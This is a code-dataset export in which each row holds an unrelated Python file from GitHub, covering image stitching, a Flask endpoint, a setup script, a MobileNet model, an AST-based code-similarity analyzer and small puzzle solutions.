seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
16181058653 | import numpy as np
import cv2
import os
import sys
import matplotlib.pyplot as plt
def detect_feature_and_keypoints(image):
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
# detect and extract features from the image
sift = cv2.xfeatures2d.SIFT_create()
keypoints, features = sift.detectAndCompute(gray, None)
keypoints = np.float32([i.pt for i in keypoints])
return keypoints, features
def feature_matching(features1, features2, ratio):
raw_match = []
match_dist = []
for i in range(features1.shape[0]):
if np.linalg.norm(features1[i] - features2[0]) < np.linalg.norm(features1[i] - features2[1]):
closest = np.linalg.norm(features1[i] - features2[0])
second = np.linalg.norm(features1[i] - features2[1])
c, s = 0, 1
else:
closest = np.linalg.norm(features1[i] - features2[1])
second = np.linalg.norm(features1[i] - features2[0])
c, s = 1, 0
for j in range(2, features2.shape[0]):
dist = np.linalg.norm(features1[i] - features2[j])
if dist < second:
if dist < closest:
second = closest
closest = dist
s = c
c = j
else:
second = dist
s = j
raw_match.append((c, s))
match_dist.append((closest, second))
valid_match = []
for i, m in enumerate(raw_match):
(closest, second) = match_dist[i]
# to eliminate ambiguous matches
if closest < ratio * second:
valid_match.append((m[0], i))
return valid_match
def drawMatches(image1, image2, keypoints1, keypoints2, matches):
# combine two images together
(h1, w1) = image1.shape[:2]
(h2, w2) = image2.shape[:2]
vis = np.zeros((max(h1, h2), w1 + w2, 3), dtype='uint8')
vis[0:h1, 0:w1] = image1
vis[0:h2, w1:] = image2
# loop over the matches
for (i, j) in matches:
# draw the match
color = np.random.randint(0, high=255, size=(3,)) # make visualization more colorful
color = tuple([int(x) for x in color])
pt1 = (int(keypoints1[j][0]), int(keypoints1[j][1]))
pt2 = (int(keypoints2[i][0]) + w1, int(keypoints2[i][1]))
cv2.line(vis, pt1, pt2, color, 1)
return vis
def find_Homography(keypoints1, keypoints2, valid_match, threshold):
points1 = np.float32([keypoints1[i] for (_,i) in valid_match])
points2 = np.float32([keypoints2[i] for (i,_) in valid_match])
length = np.shape(points1)[0]
mapped_points1 = np.zeros(np.shape(points1), dtype=float)
original_coord = np.concatenate((points1, np.ones((1,np.shape(points1)[0]), dtype=float).T), axis=1)
S = 4
N = 2000
best_i = 0
best_H = np.zeros((3,3), dtype=float)
# RANSAC algorithm to find the best H
for _ in range(N):
inliers = 0
idx = np.random.choice(length, S, replace=False) # sample S index of points
# compute homography
P = np.zeros((S*2,9),np.float32)
for i in range(S):
row = i*2
P[row,:3] = P[row,-3:] = P[row+1,3:6] = P[row+1,-3:] = np.array([points1[idx[i]][0], points1[idx[i]][1], 1.0])
P[row,-3:] *= -points2[idx[i]][0]
P[row+1,-3:] *= -points2[idx[i]][1]
_, _, V = np.linalg.svd(P)
H = V[-1,:]/V[-1,-1] # normalize, so H[-1,-1]=1.0
H = H.reshape((3,3))
# map points1 from its coordinate to points2 coordinate
# H @ [x, y, 1].T = lambda * [x', y', 1]
mapped_coord = original_coord @ H.T
for i in range(length):
mapped_points1[i][0] = mapped_coord[i][0] / mapped_coord[i][2]
mapped_points1[i][1] = mapped_coord[i][1] / mapped_coord[i][2]
l = np.linalg.norm(mapped_points1[i] - points2[i])
if l < threshold:
inliers += 1
if inliers > best_i:
best_i = inliers
best_H = H
return best_H
def warp(image1, image2, H):
h1, w1, h2, w2 = image1.shape[0], image1.shape[1], image2.shape[0], image2.shape[1]
inv_H = np.linalg.inv(H)
result_image = np.zeros((h1, w1 + w2, 3),dtype=np.uint8)
for i in range(h2):
for j in range(w1 + w2):
# H @ [x, y, 1].T = lambda * [x', y', 1]
# inv_H @ [x, y, 1].T = 1/lambda * [x, y, 1]
coord2 = np.array([j, i, 1])
coord1 = inv_H @ coord2
coord1[0] /= coord1[2]
coord1[1] /= coord1[2]
coord1 = np.around(coord1[:2])
new_i, new_j = int(coord1[0]), int(coord1[1]) # find the closest coordinate
if new_i>=0 and new_j>=0 and new_i<w1 and new_j<h1: # check boundary
result_image[i][j] = image1[new_j][new_i] # get the pixel values in image1, and map it to the result_image
result_image[0:h2, 0:w2] = image2
return result_image
def images_stitching(image1,image2, ratio, threshold):
keypoints1, features1 = detect_feature_and_keypoints(image2)
keypoints2, features2 = detect_feature_and_keypoints(image1)
valid_match = feature_matching(features1, features2, ratio)
vis = drawMatches(image2, image1, keypoints1, keypoints2, valid_match)
H = find_Homography(keypoints1, keypoints2, valid_match, threshold)
result_image = warp(image2, image1, H)
return result_image
def change_size(image):
#delete black region
img = cv2.medianBlur(image, 5)
b = cv2.threshold(img, 15, 255, cv2.THRESH_BINARY)
binary_image = b[1]
binary_image = cv2.cvtColor(binary_image, cv2.COLOR_BGR2GRAY)
x = binary_image.shape[0]
y = binary_image.shape[1]
edges_x = []
edges_y = []
for i in range(x):
for j in range(y):
if binary_image[i][j] == 255:
edges_x.append(i)
edges_y.append(j)
left = min(edges_x)
right = max(edges_x)
width = right - left
bottom = min(edges_y)
top = max(edges_y)
height = top - bottom
pre1_picture = image[:, bottom:bottom + height]
return pre1_picture
def repair(img):
mask = np.zeros((img.shape[0],img.shape[1],1))
for i in range(img.shape[0]):
for j in range(img.shape[1]):
if (img[i,j,:]==[0,0,0]).all():
mask[i,j]=255
mask = np.uint8(mask)
dst = cv2.inpaint(img,mask,30,cv2.INPAINT_TELEA)
return dst
def read_directory(directory_name):
array_of_img = []
filenumber = len([name for name in os.listdir(directory_name) if os.path.isfile(os.path.join(directory_name, name))])
for i in range(1,filenumber+1):
img = cv2.imread(directory_name + "/" + str(i)+".jpg")
array_of_img.append(img)
return array_of_img
if __name__ == '__main__':
root = os.path.join('data')
# images = []
# directory_name = 'data'
# images = read_directory(directory_name)
# ratio = 0.75 # recommend 0.7 to 0.8
# threshold = 4.0 # recommend 0 to 10
# result_image = images[0]
# for i in range(1,len(images)):
# result_image = images_stitching([images[i],result_image], ratio, threshold)
# result_image = change_size(result_image)
# result_image = repair(result_image)
# cv2.imshow("image",result_image)
# cv2.waitKey (0)
# cv2.destroyAllWindows()
# cv2.imwrite("./result"+directory_name+".jpg",result_image)
ratio = 0.75 # recommend 0.7 to 0.8
threshold = 4.0 # recommend 0 to 10
images1 = np.array(['1.jpg','hill1.JPG','S1.jpg','1.jpg','P1.jpg'])
images2 = np.array(['2.jpg','hill2.JPG','S2.jpg','2.jpg','P2.jpg'])
for i in range(4):
img1 = cv2.imread(os.path.join(root, images1[i]))
img2 = cv2.imread(os.path.join(root, images2[i]))
result_image = images_stitching(img1,img2, ratio, threshold)
cv2.imwrite(os.path.join(f'{images1[i]}+{images2[i]}.jpg'), result_image)
#cv2.imshow('result_nature.jpg', result_image)
result_image = cv2.cvtColor(result_image, cv2.COLOR_BGR2RGB)
plt.imshow(result_image)
plt.show()
| Jackkuoo/CV | HW3/CV_HW3_3_309505018/stitch.py | stitch.py | py | 8,361 | python | en | code | 0 | github-code | 50 |
26526685783 | from flask import jsonify, request
from controller import app, db
from service.authenticate import jwt_required
from model.valid_database_model import ValidDatabase, valid_databases_share_schema
@ app.route('/getValidDatabases', methods=['GET'])
@ jwt_required
def getValidDatabases(current_user):
try:
result = valid_databases_share_schema.dump(
ValidDatabase.query.all()
)
return jsonify(result), 200
except:
return jsonify({
'message': 'valid_databases_invalid_data'
}), 400
@ app.route('/addValidDatabase', methods=['POST'])
@ jwt_required
def addValidDatabase(current_user):
try:
name = request.json.get('name')
valid_database = ValidDatabase(name=name)
db.session.add(valid_database)
db.session.commit()
return jsonify({
'message': 'valid_database_added'
}), 200
except:
return jsonify({
'message': 'valid_database_invalid_data'
}), 400
| FRIDA-LACNIC-UECE/back-end | api/controller/valid_database_controller.py | valid_database_controller.py | py | 1,024 | python | en | code | 0 | github-code | 50 |
39333877966 | #!/usr/bin/python2
"""
JSON Tokens
==============
"""
from setuptools import setup, find_packages
import unittest
def get_test_suite():
test_loader = unittest.TestLoader()
test_suite = test_loader.discover('.', pattern='unit_tests.py')
return test_suite
setup(
name='jsontokens',
version='0.0.4',
url='https://github.com/blockstack/jsontokens-py',
license='MIT',
author='Blockstack Developers',
author_email='hello@onename.com',
description=("JSON Web Token Python Library"),
keywords='json web token sign verify encode decode signature',
packages=find_packages(),
zip_safe=False,
test_suite="setup.get_test_suite",
install_requires=[
'cryptography>=1.9',
'keylib>=0.1.1',
],
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Internet',
'Topic :: Security :: Cryptography',
'Topic :: Software Development :: Libraries :: Python Modules',
]
)
| blockstack-packages/jsontokens-py | setup.py | setup.py | py | 1,113 | python | en | code | 9 | github-code | 50 |
34355928097 | from unittest.mock import MagicMock
from entrypoint import DynDNS
import pytest
@pytest.fixture
def main_obj():
obj = DynDNS()
obj.r53 = MagicMock()
return obj
def test_get_hosted_zone(main_obj):
main_obj.r53.list_hosted_zones.return_value={
"HostedZones": [{
"Id": "boston",
"Name": 'something.com.'
}]
}
main_obj.domain_name = 'mything.something.com'
main_obj.hosted_zone = 'something.com'
assert main_obj._get_hosted_zone_id() == 'boston'
def test_init(monkeypatch):
monkeypatch.setenv('HOSTED_ZONE', 'mything.something.com')
monkeypatch.setenv('DOMAIN_NAME', 'something.com')
main_obj = DynDNS()
assert main_obj.domain_name == 'something.com'
assert main_obj.hosted_zone == 'mything.something.com'
# def test_start(monkeypatch):
# monkeypatch.setenv('HOSTED_ZONE', 'kloudcover.com')
# monkeypatch.setenv('DOMAIN_NAME', 'vpn.kloudcover.com')
# obj = DynDNS()
# obj.start()
| ktruckenmiller/aws-docker-dynamic-dns | test_entrypoint.py | test_entrypoint.py | py | 990 | python | en | code | 0 | github-code | 50 |
23188207488 |
import pickle
import generating_descriptors as gd
import Profile
def load_db(pathname):
"""
returns the stored database from a pickle file
Parameters
----------
pathname: string
Returns
-------
database: dictionary mapping names to profiles
"""
with open(pathname, mode="rb") as opened_file:
database = pickle.load(opened_file)
return database
def save_db(database, pathname):
"""
saves the given database into a pickle file
Parameters
----------
database: dictionary
pathname: string
"""
with open(pathname, mode="wb") as opened_file:
pickle.dump(database, opened_file)
def add_profile(profile):
"""
adds a new profile to the database {profile.name: profile}
Parameters
----------
profile: Profile of the person to add
"""
database = load_db("database.pkl")
database[profile.name] = profile
save_db(database, "database.pkl")
def remove_profile(profile):
"""
removes a profile from the database
Parameters
----------
profile: Profile of the person to remove
"""
database = load_db("database.pkl")
database.pop(profile.name)
save_db(database, "database.pkl")
def add_image(img, name):
"""
adds the descriptor of the image to the correct profile in the database
Parameters
----------
img: string - pathname of image
name: string - name of person to add to
"""
descriptor = gd.find_faces(img)[0]
database = load_db("database.pkl")
if not name in database:
database[name] = Profile.Profile(name)
database[name].add_face_descriptor(descriptor)
save_db(database, "database.pkl")
| armaan-v924/computer-vision-capstone | database_functions.py | database_functions.py | py | 1,787 | python | en | code | 1 | github-code | 50 |
24076526190 | import tensorflow as tf
import numpy as np
import traceback
import torch
import os
class Logger(object):
"""
Общее описание класса
"""
def __init__(self, log_dir, save_weight):
"""
Create a summary writer logging to log_dir
:param log_dir: str: папка для местоположения логов
:param save_weight: str: полное имя для сохранения весов модели
"""
if not os.path.isdir(log_dir):
os.mkdir(log_dir)
self.writer = tf.summary.FileWriter(log_dir)
self.root = save_weight
self.best_acc = 0
def save_checkpoint(self, val_acc, model, optimizer, cur_epoch, cur_snap, cur_fold):
"""
Сохранить лучшее состояние сети по точности на валидации
:param val_acc: int: значение точности на валидации
:param model: модель сети
:param optimizer: текущее состояние optimizer
:param cur_epoch: int: текущая эпоха обучения
:return: bool: True - все прошло успешно, False - в противном случае
"""
try:
if val_acc > self.best_acc:
print('Saving model with validation accuracy:', val_acc)
torch.save({
'epoch': cur_epoch,
'model_state_dict': model.state_dict(),
'optimizer_state_dict': optimizer.state_dict()
}, os.path.join(self.save_weight, f's{cur_snap}_' + f'f{cur_fold}_' + 'checkpoint.pth'))
self.best_acc = val_acc
return True
except Exception as err:
print('Ошибка:\n', traceback.format_exc())
return False
def scalar_summary(self, tag, value, step):
"""Log a scalar variable."""
summary = tf.Summary(value=[tf.Summary.Value(tag=tag, simple_value=value)])
self.writer.add_summary(summary, step)
def hist_summary(self, tag, values, step, bins=1000):
"""Log a histogram of the tensor of values."""
# Create a histogram using numpy
counts, bin_edges = np.histogram(values, bins=bins)
# Fill the fields of the histogram proto
hist = tf.HistogramProto()
hist.min = float(np.min(values))
hist.max = float(np.max(values))
hist.num = int(np.prod(values.shape))
hist.sum = float(np.sum(values))
hist.sum_squares = float(np.sum(values ** 2))
# Drop the start of the first bin
bin_edges = bin_edges[1:]
# Add bin edges and counts
for edge in bin_edges:
hist.bucket_limit.append(edge)
for c in counts:
hist.bucket.append(c)
# Create and write Summary
summary = tf.Summary(value=[tf.Summary.Value(tag=tag, histo=hist)])
self.writer.add_summary(summary, step)
self.writer.flush()
| NikitaKoltok/sonar_sig | src/utils/logger.py | logger.py | py | 3,061 | python | ru | code | 0 | github-code | 50 |
31761205091 | from torch import nn
import torch
# 在模型结构中需要体现α
class DepthwiseSeparableConv(nn.Module):
def __init__(self,in_channel,out_channel,stride=1,alpha=1.):
super(DepthwiseSeparableConv, self).__init__()
# stride作用与深度可分离卷积的depth-wise模块中
in_channel = int(alpha * in_channel)
out_channel = int(alpha * out_channel)
# depth-wise
self.conv1 = nn.Conv2d(in_channel,in_channel,kernel_size=3,padding=1,stride=stride,bias=False,groups=in_channel)
self.bn1 = nn.BatchNorm2d(in_channel)
self.relu1 = nn.ReLU()
# Point-wise(1x1卷积)
self.conv2 = nn.Conv2d(in_channel,out_channel,kernel_size=1,bias=False)
self.bn2 = nn.BatchNorm2d(out_channel)
self.relu2 = nn.ReLU()
def forward(self,x):
out1 = self.relu1(self.bn1(self.conv1(x)))
out2 = self.relu2(self.bn2(self.conv2(out1)))
return out2
class MobileNet(nn.Module):
def __init__(self,alpha = 1.):
super(MobileNet, self).__init__()
# 第一个模块使用标准卷积
self.conv = nn.Conv2d(3,int(alpha * 32),kernel_size=3,padding=1,stride=2,bias=False)
self.bn = nn.BatchNorm2d(int(alpha * 32))
self.relu = nn.ReLU(inplace=True)
# 深度可分离卷积模块
self.ds_conv_1 = DepthwiseSeparableConv(in_channel=32,out_channel=64,stride=1,alpha=alpha)
self.ds_conv_2 = DepthwiseSeparableConv(in_channel=64, out_channel=128, stride=2, alpha=alpha)
self.ds_conv_3 = DepthwiseSeparableConv(in_channel=128, out_channel=128, stride=1, alpha=alpha)
self.ds_conv_4 = DepthwiseSeparableConv(in_channel=128, out_channel=256, stride=2, alpha=alpha)
self.ds_conv_5 = DepthwiseSeparableConv(in_channel=256, out_channel=256, stride=1, alpha=alpha)
self.ds_conv_6 = DepthwiseSeparableConv(in_channel=256, out_channel=512, stride=2, alpha=alpha)
self.ds_conv_7_1 = DepthwiseSeparableConv(in_channel=512, out_channel=512, stride=1, alpha=alpha)
self.ds_conv_7_2 = DepthwiseSeparableConv(in_channel=512, out_channel=512, stride=1, alpha=alpha)
self.ds_conv_7_3 = DepthwiseSeparableConv(in_channel=512, out_channel=512, stride=1, alpha=alpha)
self.ds_conv_7_4 = DepthwiseSeparableConv(in_channel=512, out_channel=512, stride=1, alpha=alpha)
self.ds_conv_7_5 = DepthwiseSeparableConv(in_channel=512, out_channel=512, stride=1, alpha=alpha)
self.ds_conv_8 = DepthwiseSeparableConv(in_channel=512, out_channel=1024, stride=2, alpha=alpha)
self.ds_conv_9 = DepthwiseSeparableConv(in_channel=1024, out_channel=1024, stride=2, alpha=alpha)
self.avg_pool = nn.AdaptiveAvgPool2d((1,1))
self.fc = nn.Linear(int(alpha * 1024), 2)
def get_param_num(self):
param_count = 0
for param in self.parameters():
param_count += param.numel()
return param_count
def forward(self,x):
x = self.relu(self.bn(self.conv(x)))
x = self.ds_conv_1(x)
x = self.ds_conv_2(x)
x = self.ds_conv_3(x)
x = self.ds_conv_4(x)
x = self.ds_conv_5(x)
x = self.ds_conv_6(x)
x = self.ds_conv_7_1(x)
x = self.ds_conv_7_2(x)
x = self.ds_conv_7_3(x)
x = self.ds_conv_7_4(x)
x = self.ds_conv_7_5(x)
x = self.ds_conv_8(x)
x = self.ds_conv_9(x)
x = self.avg_pool(x)
x = x.reshape(x.shape[0],-1)
x = self.fc(x)
return x
class Normal_Conv(nn.Module):
def __init__(self):
super(Normal_Conv, self).__init__()
self.blk1 = blk(3,32,stride=2)
self.blk2 = nn.Sequential(blk(32,64,stride=1),blk(64,128,stride=2))
self.blk3 = nn.Sequential(blk(128,128,stride=1),blk(128,256,stride=2))
self.blk4 = nn.Sequential(blk(256, 256, stride=1), blk(256, 512, stride=2))
self.blk5 = nn.Sequential(blk(512, 512, stride=1),blk(512, 512, stride=1),blk(512, 512, stride=1),
blk(512, 512, stride=1),blk(512, 512, stride=1))
self.blk6 = nn.Sequential(blk(512, 1024, stride=2),blk(1024, 1024, stride=2))
self.avg_pool = nn.AdaptiveAvgPool2d((1,1))
self.fc = nn.Linear(1024, 2)
def forward(self,x):
x = self.blk1(x)
x = self.blk2(x)
x = self.blk3(x)
x = self.blk4(x)
x = self.blk5(x)
x = self.blk6(x)
x = self.avg_pool(x)
x = x.reshape(x.shape[0],-1)
return self.fc(x)
def get_param_num(self):
param_count = 0
for param in self.parameters():
param_count += param.numel()
return param_count
class blk(nn.Module):
def __init__(self,in_channel,ouu_channel,stride):
super(blk, self).__init__()
self.net = nn.Sequential(nn.Conv2d(in_channel,ouu_channel,kernel_size=3,padding=1,stride=stride,bias=False),
nn.BatchNorm2d(ouu_channel),nn.ReLU())
def forward(self,x):
return self.net(x)
if __name__ == '__main__':
torch.manual_seed(1)
device = torch.device('cuda')
x = torch.randn(size=(1,3,224,224),device=device)
net1 = MobileNet(1).to(device)
print(net1.get_param_num())
net = Normal_Conv().to(device)
print(net.get_param_num())
| hu12jiangtao/- | mobilenet v11/mobilenet_v1理解/model.py | model.py | py | 5,469 | python | en | code | 0 | github-code | 50 |
1937713173 | '''
'PYTHON CODE SIMILARITY ANALYZER'
Created for the course of Artificial Intelligence,
taught by Sir Sikandar Khan at SZABIST.
Authors:
Esha Rashid CS-1812262
Hamza Hussain CS-1812264
'''
import ast
import astor
import math
import json
import re
from difflib import SequenceMatcher
from difflib import unified_diff
JsonObject = {
"lines" : '',
"length" : '',
"disSimilarity" : '',
"probableSimilarity" : '',
"modify" : '',
"ratio" : '',
"index" : '',
"tree" : '',
"i" : 0
}
JsonObjectTwo = {
"similarExpressions" : 0.0,
"similarAssignments" : 0.0,
"similarIterators" : 0.0,
"similarFunctions" : 0.0,
"similarIdentifiers" : 0.0
}
expr = []
expr_2 = []
expr_helper = []
collect_if_helper = []
collect_assign_1 = []
collect_assign_2 = []
collect_assign_helper = []
collect_call_1 = []
collect_call_2 = []
collect_call_helper = []
collect_for_1 = []
collect_for_2 = []
collect_for_helper = []
targetsOne = []
targetsTwo = []
targets = []
'''
Helper functions are defined here
'''
def nearestTen(a, b):
greater = max(a, b)
rounded = round(greater/10)*10
return rounded
def compareNodes(array_one, array_two):
ratio = 0
if len(array_one) > len(array_two):
start_1 = len(array_one)
start_2 = len(array_two)
assign_1_bigger = True
else:
start_1 = len(array_two)
start_2 = len(array_one)
assign_1_bigger = False
for i in range(start_1):
for j in range(start_2):
if assign_1_bigger:
if array_one[i] == array_two[j]:
ratio = ratio + 1
else:
if array_two[i] == array_one[j]:
ratio = ratio + 1
if start_1 != 0:
return round((ratio/start_1) * 100, 2)
else:
return 0
def compareIdentifiers(array_one, array_two):
ratio = 0
if len(array_one) > len(array_two):
start_1 = len(array_one)
start_2 = len(array_two)
assign_1_bigger = True
else:
start_1 = len(array_two)
start_2 = len(array_one)
assign_1_bigger = False
for i in range(start_1):
for j in range(start_2):
if assign_1_bigger:
if array_one[i] == array_two[j]:
ratio = ratio + 1
break
else:
if array_two[i] == array_one[j]:
ratio = ratio + 1
break
if start_1 != 0:
return round((ratio/(start_1)) * 100, 2)
else:
return 0
def compareExpr():
ratio = 0
if len(expr) > len(expr_2):
start_1 = len(expr)
start_2 = len(expr_2)
expr_bigger = True
expr_2_bigger = False
else:
start_1 = len(expr_2)
start_2 = len(expr)
expr_bigger = False
expr_2_bigger = True
match = 0
for i in range(start_1):
for j in range(start_2):
for k in range(3):
if expr_bigger:
if expr_2[j][k] == expr[i][k]:
match = match + 1
else:
if expr_2[i][k] == expr[j][k]:
match = match + 1
if match >= 2:
print("\n\n")
print(expr_2[i])
print(" ==== ")
print(expr[j])
print("\n\n")
ratio = ratio + 1
match = 0
if start_1 != 0:
return (ratio / start_1) * 100
else:
return 0
'''
Node Transformer Class
AST's own class NodeTransformer is used to normalize the AST
Get rid of unimportant information
and information specific to the nodes.
Node Visitor Class
Below this is the NodeVisitor class, to traverse the tree
and extract useful details to compare later.
'''
class nodeTransformer(ast.NodeTransformer):
def visit_Name(self, node):
if hasattr(node, 'id'):
del node.id
self.generic_visit(node)
return node
def visit_Assign(self, node):
# if hasattr(node, 'ctx'):
# del node.ctx
if hasattr(node, 'type_comment'):
del node.type_comment
for target in node.targets:
if isinstance(target, ast.Name):
del target.id
del node.targets
self.generic_visit(node)
return node
def visit_Attribute(self, node):
del node.attr
del node.ctx
self.generic_visit(node)
return node
def visit_For(self, node):
node.target
self.generic_visit(node)
return node
def visit_Import(self, node):
pass
def visit_ImportFrom(self, node):
pass
def visit_Call(self, node):
if hasattr(node, 'args'):
if len(node.args) == 0:
del node.args
del node.keywords
self.generic_visit(node)
return(node)
class nodeVisitor(ast.NodeVisitor):
def visit_Name(self, node):
targets.append(node.id)
def visit_Assign(self, node):
this_assignment = []
for target in node.targets:
if isinstance(target, ast.Name):
if hasattr(target, 'id'):
this_assignment.append(target.id)
if hasattr(node, 'value'):
if hasattr(node.value, 'value'):
this_assignment.append(node.value.value)
collect_assign_helper.append(this_assignment)
def visit_BinOp(self, node):
this_expr = []
# this_expr.append(astor.dump_tree(node))
this_expr.append(astor.dump_tree(node.left))
this_expr.append(astor.dump_tree(node.op))
this_expr.append(astor.dump_tree(node.right))
expr_helper.append(this_expr)
self.generic_visit(node)
def visit_Compare(self, node):
this_comparer = []
if hasattr(node.left, 'id'):
this_comparer.append(node.left.id)
elif hasattr(node.left, 'value'):
this_comparer.append(node.left.value)
this_comparer.append(astor.dump_tree(node.ops))
for c in node.comparators:
if hasattr(c, 'id'):
this_comparer.append(node.left.id)
elif hasattr(c, 'value'):
this_comparer.append(c.value)
collect_if_helper.append(this_comparer)
def visit_For(self, node):
this_for = []
if hasattr(node.target, 'id'):
this_for.append(node.target.id)
this_for.append(astor.dump_tree(node.iter))
# print(node.iter.id)
collect_for_helper.append(this_for)
def visit_Call(self, node):
this_call = []
# print(astor.dump_tree(node.func))
if hasattr(node.func, 'id'):
this_call.append(node.func.id)
for arg in node.args:
if hasattr(arg, 'value'):
this_call.append(arg.value)
elif hasattr(arg, 'id'):
this_call.append(arg.id)
else:
this_call.append(astor.dump_tree(arg))
collect_call_helper.append(this_call)
self.generic_visit(node)
'''
Unified Diff Algorithm
use of unified_diff from the difflib library,
mainly to identify disimilarity and average out the similarity of
longest common sequence and the probable similarity in the code.
'''
def Unified_Diff_Algorithm(treeOne, treeTwo):
treeline = astor.dump_tree(treeOne).split('\n')
treeline2 = astor.dump_tree(treeTwo).split('\n')
# Splitted both the trees into lists on each new line.
n = astor.dump_tree(treeOne)
percentage = 0
percentageTwo = 0
#count1 = -1
#count2 = -1
for line in unified_diff(treeline, treeline2, n=0):
if line[0] == '-':
if percentage == 0:
percentage = (len(line)/len(n))*100
else:
percentage = percentage + (len(line))
if line[0] == '+':
if percentageTwo == 0:
percentageTwo = (len(line)/len(n))*100
else:
percentageTwo = percentageTwo + (len(line))
Dissimilarity = round((percentage / len(n)) * 100, 2)
Similarity = round(100 - (percentage / len(n)) * 100, 2)
codeToAdd = round((percentageTwo / len(n)) * 100, 2)
matchedSequences = round(SequenceMatcher(None, ast.dump(treeOne), ast.dump(treeTwo)).ratio() * 100, 2)
amplify = Similarity + matchedSequences
amplify = amplify/math.ceil(amplify/100.0) * nearestTen(Similarity, matchedSequences)
result = round(amplify / 100, 2)
JsonObject['lines'] = f"Total lines in AST = {len(treeline)}"
JsonObject['length'] = f"Character length of candidate file = {len(n)}"
JsonObject['disSimilarity'] = f"Dissimilarity = {Dissimilarity} % "
JsonObject['probableSimilarity'] = f"Probable Similarity = {Similarity} %"
JsonObject['modify'] = f"Code to add from reference to candidate will amount to {codeToAdd} %"
JsonObject['ratio'] = f"Ratio of Matching sequences found = {matchedSequences} %"
JsonObject['index'] = f"Similarity Index: {result} %"
JsonObject['i'] = result
JsonObject['tree'] = n
#in {(len(treeline)-count1) if(len(treeline)-count1)>0 else 0} lines of AST
#in {count1} lines of AST
#of candidate and {count2} lines of AST
'''
Functions to export
'''
def analyseSimilarity(codeOne, codeTwo):
docStringRegEx = r'"""[\s\S]*?"""'
codeOne = re.sub(docStringRegEx, '', codeOne)
codeTwo = re.sub(docStringRegEx, '', codeTwo)
docStringRegExTwo = r'\'\'\'[\s\S]*?\'\'\''
codeOne = re.sub(docStringRegExTwo, '', codeOne)
codeTwo = re.sub(docStringRegExTwo, '', codeTwo)
treeOne = ast.parse(codeOne)
treeTwo = ast.parse(codeTwo)
# TRANSFORMING THE TREE HERE
TreeOneTransformed = nodeTransformer().visit(treeOne)
TreeTwoTransformed = nodeTransformer().visit(treeTwo)
global JsonObject
Unified_Diff_Algorithm(TreeOneTransformed, TreeTwoTransformed)
return json.dumps(JsonObject)
def analyseNodes(codeOne, codeTwo):
treeOne = ast.parse(codeOne)
treeTwo = ast.parse(codeTwo)
global expr
global expr_2
global expr_helper
global collect_assign_1
global collect_assign_2
global collect_assign_helper
global collect_call_1
global collect_call_2
global collect_call_helper
global collect_for_1
global collect_for_2
global collect_for_helper
global targetsOne
global targetsTwo
global targets
global JsonObjectTwo
# VISITING NODES HERE
nodeVisitor().visit(treeOne)
# helpers go here
collect_for_1 = collect_for_helper
collect_for_helper = []
collect_call_1 = collect_call_helper
collect_call_helper = []
expr = expr_helper
expr_helper = []
collect_assign_1 = collect_assign_helper
collect_assign_helper = []
targetsOne = targets
targets = []
nodeVisitor().visit(treeTwo)
# helpers go here
collect_for_2 = collect_for_helper
collect_for_helper = []
collect_call_2 = collect_call_helper
collect_call_helper = []
expr_2 = expr_helper
expr_helper = []
collect_assign_2 = collect_assign_helper
collect_assign_helper = []
targetsTwo = targets
targets = []
r = compareExpr()
JsonObjectTwo["similarExpressions"] = r
r = compareNodes(collect_assign_1, collect_assign_2)
JsonObjectTwo["similarAssignments"] = r
r = compareNodes(collect_for_1, collect_for_2)
JsonObjectTwo["similarIterators"] = r
r = compareNodes(collect_call_1, collect_call_2)
JsonObjectTwo["similarFunctions"] = r
r = compareIdentifiers(targetsOne, targetsTwo)
JsonObjectTwo["similarIdentifiers"] = r
return json.dumps(JsonObjectTwo) | hamzahussyn/SimilarityAnalyser | SimilarityAnalyzer.py | SimilarityAnalyzer.py | py | 11,828 | python | en | code | 1 | github-code | 50 |
32178668998 | #!/usr/bin/env python3
import sys
n = int(sys.argv[1])
total_lines = []
unique_lines = set()
for line in sys.stdin:
line = " ".join(line.lower().split())
total_lines.append(line)
unique_lines.add(line)
if len(unique_lines) >= n:
print(f"{n} distinct lines seen after {len(total_lines)} lines read.")
sys.exit(0)
print(f"End of input reached after {len(total_lines)} lines read - {n} different lines not seen.") | Syyre/COMP2041 | test09/distinct_lines.py | distinct_lines.py | py | 444 | python | en | code | 1 | github-code | 50 |
44196669020 | from logging import getLogger
from hornet import models
from .common import ClientCommand
logger = getLogger(__name__)
class Command(ClientCommand):
def add_arguments(self, parser):
parser.add_argument("member_id", type=int)
parser.add_argument("text")
def handle(self, member_id, text, *args, **kwargs):
try:
member = models.Member.objects.get(pk=member_id)
except models.Member.DoesNotExist:
self.stderr.write("Unknown member")
return
self.client.send_message(member, text)
| namezys/mandilka | hornet/management/commands/hornet_send_message.py | hornet_send_message.py | py | 567 | python | en | code | 0 | github-code | 50 |
42243755878 | import sys
E_HITS, E_D = [int(line.split(': ')[1]) for line in sys.stdin.readlines()]
M_HITS, MANA = 50, 500
SPELLS = [
# cost, dmg, heal, arm, mana, delay
(53, 4, 0, 0, 0, 0),
(73, 2, 2, 0, 0, 0),
(113, 0, 0, 7, 0, 6),
(173, 3, 0, 0, 0, 6),
(229, 0, 0, 0, 101, 5)
]
def run(hard):
min_cost = 1e30
queue = [((E_HITS, M_HITS, MANA, [], True, 0))]
while queue:
e_h, m_h, mana, effects, m_turn, cost = queue.pop()
if cost >= min_cost:
continue
if hard and m_turn:
m_h -= 1
if m_h <= 0:
continue
m_arm = 0
for s, _ in effects:
effect = SPELLS[s]
e_h -= effect[1]
m_h += effect[2]
m_arm += effect[3]
mana += effect[4]
effects = [(s, d-1) for s, d in effects if d > 1]
if e_h <= 0:
min_cost = min(cost, min_cost)
continue
if m_turn:
for s in range(len(SPELLS)):
if any(map(lambda e: e[0] == s, effects)):
continue # already active
spell_cost = SPELLS[s][0]
if spell_cost > mana:
continue
queue.append((e_h, m_h, mana - spell_cost, effects + [(s, SPELLS[s][5])], False, cost + spell_cost))
else:
m_h -= max(1, E_D - m_arm)
if m_h > 0:
queue.append((e_h, m_h, mana, effects, True, cost))
return min_cost
print(run(False))
print(run(True))
